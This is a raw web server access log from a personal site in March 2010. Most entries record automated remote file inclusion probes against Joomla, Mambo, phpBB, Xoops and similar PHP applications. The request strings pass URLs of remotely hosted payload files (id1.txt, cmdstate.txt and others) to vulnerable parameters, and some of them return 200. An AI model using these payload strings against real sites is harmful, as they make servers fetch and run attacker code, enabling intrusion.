173.203.215.83 - - [12/Mar/2010:09:27:11 -0800] "GET /logs/access_091023.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.111.95.42 - - [12/Mar/2010:09:27:12 -0800] "GET /logs/access_080925.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.etegro.com/kz//includes/id.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:27:52 -0800] "GET /delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:27:52 -0800] "GET /logs//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:27:52 -0800] "GET /logs/access_090715.log%20%20//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:28:13 -0800] "GET /logs/access_080607.log///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:28:15 -0800] "GET /logs/access.log%20%20//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:28:16 -0800] "GET /logs/access_080825.log///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:09:28:19 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:09:28:19 -0800] "GET /logs/access_080501.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:09:28:22 -0800] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:09:28:27 -0800] "GET /logs/access_071228.log/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
204.202.2.23 - - [12/Mar/2010:09:28:36 -0800] "GET /logs/access_080315.log/index.php?error=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
204.202.2.23 - - [12/Mar/2010:09:28:37 -0800] "GET /logs/access_080207.log/index.php?error=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:09:28:37 -0800] "GET /logs/access_080325.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:28:43 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:28:50 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:28:50 -0800] "GET /logs/access_090424.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:29:13 -0800] "GET /logs/access_081104.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:29:13 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:29:15 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 200 15092 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:29:16 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:29:16 -0800] "GET /logs/access_081104.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:29:17 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 200 15092 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.221 - - [12/Mar/2010:09:29:30 -0800] "GET /logs/access_081024.log HTTP/1.0" 200 5401949 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:09:29:31 -0800] "GET /logs/access_091024.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:29:44 -0800] "GET /logs/access_090730.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:29:44 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:29:45 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:29:47 -0800] "GET /logs/access_090730.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:29:47 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:29:48 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:29:53 -0800] "GET /logs/access_091115.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.114 - - [12/Mar/2010:09:29:54 -0800] "GET /logs/access_091115.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://myslowice.activh.pl//news//inc/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:30:27 -0800] "GET /delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:30:27 -0800] "GET /logs//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:30:31 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:30:31 -0800] "GET /write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:30:31 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:30:32 -0800] "GET /logs/access_090715.log%20%20//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.68.17.35 - - [12/Mar/2010:09:30:44 -0800] "GET /logs/access_081002.log=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:30:44 -0800] "GET /logs/access_100211.log%20%20//write_comment_update.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.11.114.148 - - [12/Mar/2010:09:30:49 -0800] "GET /logs/access.log%20%20//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:09:31:03 -0800] "GET /logs/access_091021.log//docebo/doceboLms//class/class.dashboard_lms.php?where_framework=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:33:53 -0800] "GET /logs/access_090124.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:33:53 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:33:53 -0800] "GET /logs/access_080215.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:33:53 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:33:55 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 200 15098 "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:33:55 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:33:59 -0800] "GET /logs/access_080215.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:33:59 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:33:59 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 200 15098 "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:34:02 -0800] "GET /logs/access_080623.log/admincp/auth/checklogin.php?cfgProgDir=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:34:09 -0800] "GET /logs/access_090124.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:34:09 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:34:09 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:34:19 -0800] "GET /logs/access_090208.log/admincp/auth/checklogin.php?cfgProgDir=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:09:34:31 -0800] "GET /logs/access_091125.log//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:09:34:31 -0800] "GET /logs//index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.241.24.100 - - [12/Mar/2010:09:34:32 -0800] "GET /index.php?option=com_content&view=article&id=56&Itemid=&mosConfig_absolute_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 15078 "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:09:34:44 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:34:46 -0800] "GET /logs/access_100211.log%20%20//delete_all.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:34:46 -0800] "GET /delete_all.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:34:46 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [12/Mar/2010:09:34:47 -0800] "GET /logs/access_100205.log%20%20//delete_all.php?board_skin_path=http://www.efataproducciones.cl/e//administrator/modules/COPYME.TXT?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:34:51 -0800] "GET /logs/access_080215.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.217.242.70 - - [12/Mar/2010:09:34:55 -0800] "GET /logs/access_090715.log%20%20//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.217.242.70 - - [12/Mar/2010:09:34:55 -0800] "GET /delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.217.242.70 - - [12/Mar/2010:09:34:55 -0800] "GET /logs/access_090715.log%20%20//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.217.242.70 - - [12/Mar/2010:09:34:55 -0800] "GET /delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.217.242.70 - - [12/Mar/2010:09:34:55 -0800] "GET /logs//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.217.242.70 - - [12/Mar/2010:09:34:55 -0800] "GET /logs//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:35:04 -0800] "GET /logs/access_090730.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:35:13 -0800] "GET /logs/access_080925.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.233.162.183 - - [12/Mar/2010:09:35:14 -0800] "GET /logs/access_090730.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:35:14 -0800] "GET /logs/access_080925.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.217.242.70 - - [12/Mar/2010:09:35:18 -0800] "GET /logs/access.log%20%20//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
124.217.242.70 - - [12/Mar/2010:09:35:22 -0800] "GET /logs/access.log%20%20//delete.php?board_skin_path=http://art-investments.eu/id1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.68.17.35 - - [12/Mar/2010:09:35:43 -0800] "GET /logs/access_090106.log=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.dmulk.com"
125.247.160.130 - - [12/Mar/2010:09:35:44 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.247.160.130 - - [12/Mar/2010:09:35:44 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.247.160.130 - - [12/Mar/2010:09:35:44 -0800] "GET /logs/access_090402.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:35:55 -0800] "GET /logs/access_080215.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:09:36:20 -0800] "GET /logs/access_080925.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.oyotunjiafricanvillage.org/modules/shop/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
125.247.160.130 - - [12/Mar/2010:09:36:26 -0800] "GET /logs/access_090711.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.espace-poker.com/cok/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:09:36:27 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:09:36:29 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:09:36:30 -0800] "GET /logs/access_080619.log//include/admin.lib.inc.php?site_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.114.107.92 - - [12/Mar/2010:09:36:33 -0800] "GET /blog/index.php/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/ HTTP/1.1" 200 22753 "http://www.zrxoa.com/forums/showthread.php?t=233058" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "dmulk.com"
216.114.107.92 - - [12/Mar/2010:09:36:33 -0800] "GET /blog/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0 HTTP/1.1" 200 6637 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "dmulk.com"
216.114.107.92 - - [12/Mar/2010:09:36:33 -0800] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.3.2 HTTP/1.1" 200 57276 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "dmulk.com"
216.114.107.92 - - [12/Mar/2010:09:36:33 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.1" 200 3864 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "dmulk.com"
216.114.107.92 - - [12/Mar/2010:09:36:33 -0800] "GET /blog/wp-includes/js/swfobject.js?ver=2.1 HTTP/1.1" 200 9759 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "dmulk.com"
216.114.107.92 - - [12/Mar/2010:09:36:33 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/style.css HTTP/1.1" 200 10083 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:36:37 -0800] "GET /logs/access_100107.log/admincp/auth/checklogin.php?cfgProgDir=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
76.10.128.217 - - [12/Mar/2010:09:36:37 -0800] "GET /logs/access_080701.log/admincp/auth/checklogin.php?cfgProgDir=http://www.espace-poker.com/cok/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.114.107.92 - - [12/Mar/2010:09:36:39 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.js?ver=3.1-20091124 HTTP/1.1" 200 12185 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "dmulk.com"
216.114.107.92 - - [12/Mar/2010:09:36:40 -0800] "GET /blog/wp-content/uploads/imagerotator.swf HTTP/1.1" 200 42753 "http://dmulk.com/blog/2009/10/24/how-do-you-do-144mph-with-a-stock-wr250r-10242009/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "dmulk.com"
216.114.107.92 - - [12/Mar/2010:09:36:40 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "dmulk.com"
